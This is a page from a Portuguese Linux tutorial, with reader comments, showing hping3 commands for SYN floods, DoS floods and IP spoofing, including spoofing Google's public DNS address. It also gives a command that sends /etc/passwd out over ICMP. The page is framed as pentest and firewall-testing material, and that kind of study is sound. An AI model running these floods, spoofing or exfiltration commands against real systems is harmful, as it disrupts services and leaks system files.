Utilizando hping

Neste artigo farei uma apresentação e alguns exemplos de utilização do hping, uma ferramenta muito útil para trabalhos de pentest, testar IDS, firewall.

[ Hits: 87.798 ]

Por: Marcos Carraro em 09/08/2011


Exemplos



Exemplos básicos

Floodar com 10mil syn um ip na porta 80:

# hping3 --flood --syn -c 10000 -a 1.2.3.4 -p 80 200.157.25.8

DoS - O ataque DoS, tem a ideia de fazer com que a placa de rede, ip, banda, não consiga respirar, fazendo disso uma parada dos serviços, ela simplesmente não consegue mais responder.

# hping3 --flood 200.157.25.8

DoS com outra TTL - Podemos mudar os nossos "HOPS" para chegar em nosso destino como neste caso, e fazemos uma inundação de 100 pacotes com ttl 250 para o IP, podemos usar outras tantas combinações de uma linha.

# hping --flood --ttl 250 --count 100 192.168.0.1

Spoof com um falso IP - Esta parte é legal até, podemos mandar milhares de pacotes com outro IP, não cheguei a testar em um FW público.

# hping --spoof 1.2.3.4 192.168.0.1
(hping --spoof FALSOIP IPQUENTE)

DoS com spoofing - Que tal fazer um DoS e IP spoofing ao mesmo tempo? Colocamos um IP falso para que o "destino" não desconfie EHEHEHEH. Isso é ate legal de se fazer, com testes interno funciona perfeitamente.

# hping --flood --spoof 8.8.8.8 --ttl 66 192.168.0.2

Spoof Loucão - HAHHA que tal mandar várias inundações loucamente para um IP?

# hping3 --spoof 192.168.0.2 --icmp-ts 192.168.0.1
(hping3 --spoof MEUIP --icmp-ts IPDESTINO)

Exemplos mais complexos

Flood com assinatura - No caso ele vai enviar alguns pacotes com esta rotulação podendo ser um arquivo ou simplesmente na escrita, como vemos nos exemplos.

# hping3 --flood --syn -a 1.2.3.4 -e "TESTANDO" -S -s 80 192.168.0.1

Monitorando com tcpdump:

	0x0000:  45c0 006a 9f79 0000 4001 7e97 ac10 01d1  E..j.y..@.~.....
	0x0010:  ac10 01d1 0303 590b 0000 0000 4500 004e  ......Y.....E..N
	0x0020:  e171 0000 4011 3d6b ac10 01d1 ac10 01d1  .q..@.=k........
	0x0030:  0a28 0007 003a 0902 5445 5354 4554 4553  .(...:..TESTETES
	0x0040:  5445 0a00 0000 0000 0000 0000 0000 0000  TE..............
	0x0050:  0000 0000 0000 0000 0000 0000 0000 0000  ................

Criando arquivo de assinatura:

# echo "TESTETESTE" > /vat/tmp/assinatura.sig

Enviando o ataque:

# hping -2 -p 7 192.168.0.3 -d 50 -E /var/tmp/assinatura.sig

Para monitorar:

# tcpdump -i ethX -nX proto 17
	0x0000:  45c0 006a 9f79 0000 4001 7e97 ac10 01d1  E..j.y..@.~.....
	0x0010:  ac10 01d1 0303 590b 0000 0000 4500 004e  ......Y.....E..N
	0x0020:  e171 0000 4011 3d6b ac10 01d1 ac10 01d1  .q..@.=k........
	0x0030:  0a28 0007 003a 0902 5445 5354 4554 4553  .(...:..TESTETES
	0x0040:  5445 0a00 0000 0000 0000 0000 0000 0000  TE..............
	0x0050:  0000 0000 0000 0000 0000 0000 0000 0000  ................

Transferir informações pelo ICMP - Que parte louca, sim quando esta lendo alguns manuais na internet achei engraçado esta parte:

# hping 192.168.0.3 --icmp -d 100 --sign signature --file /etc/passwd

Monitorando:

# tcpdump -i ethX -nX

A saída é bem parecida.

Página anterior     Próxima página

Páginas do artigo
   1. Introdução
   2. Instalação
   3. Exemplos
   4. Finalizando
Outros artigos deste autor

Switch HP + Gerenciador Console + VLAN + DMZ + CentOS com VLAN

Instalando Carraro DashBoard

Leitura recomendada

Como instalar o Avast antivírus no Linux

Deface: A arte de desconfigurar sites

Biometria facial na autenticação do usuário root

Instalação do Comodo Antivirus para Linux (CAVL) resolvendo o problema de dependências

Ataque de Rougue AP com AIRBASE-NG

  
Comentários
[1] Comentário enviado por dvdias em 10/08/2011 - 09:44h

hping --flood --spoof 8.8.8.8 --ttl 66 192.168.0.2

Veja a Ultima linha do traceroute 8.8.8.8
google-public-dns-a.google.com (8.8.8.8)

O exemplo de flood loucão no DNS do google foi sem querer?

Com a falta de IPs v4 válidos até aquele que achávamos inexistentes estão sendo usados. Logo logo o clássico exemplo 1.2.3.4 não será mais fictício, logo teremos que apelar para 300.300.300.300 hehehehe

Bom artigo.

[2] Comentário enviado por dennis.leandro em 11/08/2011 - 00:01h

Muito bom artigo parceiro!
Será de grande ajuda aos iniciantes e um manualzinho de referencia a alguns preguiçosos(assim como eu)!
auhsuahsuahushuahuhas

Parabéns!

[3] Comentário enviado por marcoscarraro em 11/08/2011 - 08:19h

@dvdia Cara, mostrei o dns do google, com um exemplo, podendo usar um IP real de outra pessoa para brincar.... ;D
300 Oo

@denisleandro é magnata, imagina o trablho que deu para escrever HEHEHHE, sorte dos livros pois o manual dos caras não é o bicho.

abraços e aproveitam para acessar o blog também marcoscarraro.blogspot.com
Marcos Carraro

[4] Comentário enviado por removido em 14/08/2011 - 10:59h

marcos gostei da tool , ja conhecia mais não sabia o seu uso , so não deixa o pessoal do lulzsec saber hein rs rs

abraços

[5] Comentário enviado por removido em 14/08/2011 - 11:00h

outra coisas , acho que esse artigo devia ter ido para o segurança linux , seria o local mais apropriado .

[6] Comentário enviado por molinero em 16/08/2011 - 19:14h

Instalação no Slackware também pode ser via SlackBuilds.
Se tiver o sbopkg é mais fácil ainda

# sbopkg -i hping3

[7] Comentário enviado por lpossamai em 18/08/2011 - 13:09h

ótimo artigo Marcos!

[8] Comentário enviado por marcoscarraro em 22/08/2011 - 19:20h

Valeu galera....

Espero que gostem, se alguém tiver mais conteudo a adicionar sera bem vindo...

Não esqueçam de visitar meu blog....

marcoscarraro.blogspot.com

abraços Marcos Carraro


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts